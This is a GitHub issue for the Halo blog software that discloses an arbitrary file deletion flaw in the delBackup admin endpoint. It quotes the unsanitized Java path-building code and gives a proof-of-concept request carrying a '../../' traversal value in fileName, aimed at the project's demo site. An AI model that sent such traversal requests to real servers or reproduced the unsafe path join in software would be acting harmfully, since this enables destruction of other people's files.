Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Any file deletion in the background #136

Closed
5 of 6 tasks
kingz40o opened this issue Apr 4, 2019 · 2 comments
Closed
5 of 6 tasks

Any file deletion in the background #136

kingz40o opened this issue Apr 4, 2019 · 2 comments
Labels
vulnerability Vulnerability

Comments

@kingz40o
Copy link

kingz40o commented Apr 4, 2019

我确定我已经查看了 (标注[ ][x])


我要申请 (标注[ ][x])

  • BUG 反馈
  • 添加新的特性或者功能
  • 请求技术支持

There is an arbitrary file deletion vulnerability in the backup file deletion.

@GetMapping(value = "delBackup")
    @ResponseBody
    public JsonResult delBackup(@RequestParam("fileName") String fileName,
                                @RequestParam("type") String type) {
        final String srcPath = System.getProperties().getProperty("user.home") + "/halo/backup/" + type + "/" + fileName;
        try {
            FileUtil.del(srcPath);
            return new JsonResult(ResultCodeEnum.SUCCESS.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-success"));
        } catch (Exception e) {
            return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-failed"));
        }
    }

eg.

GET /admin/backup/delBackup?type=posts&fileName=../../upload/2019/3/veer-15238236420190404102850332.jpg HTTP/1.1
Host: demo.halo.run
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Referer: https://demo.halo.run/admin/backup?type=posts
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=jLIF44HA_8IHwVFhq66-jAArsdL3Mtz_tg2GvNhO

image
The vulnerability discoverer by Chaitin Tech.

@JohnNiang JohnNiang added the vulnerability Vulnerability label Apr 5, 2019
@ruibaby
Copy link
Member

ruibaby commented May 28, 2019

准备发布 v1,所以关闭该 issue。

@ruibaby ruibaby closed this as completed May 28, 2019
@kingz40o
Copy link
Author

JohnNiang pushed a commit to JohnNiang/halo that referenced this issue Mar 2, 2023
…alo-dev#136)

Bumps [filepond-plugin-image-preview](https://github.com/pqina/filepond-plugin-image-preview) from 4.6.1 to 4.6.2.
- [Release notes](https://github.com/pqina/filepond-plugin-image-preview/releases)
- [Commits](pqina/filepond-plugin-image-preview@4.6.1...4.6.2)

Signed-off-by: dependabot-preview[bot] <support@dependabot.com>

Co-authored-by: dependabot-preview[bot] <27856297+dependabot-preview[bot]@users.noreply.github.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
vulnerability Vulnerability
Projects
None yet
Development

No branches or pull requests

3 participants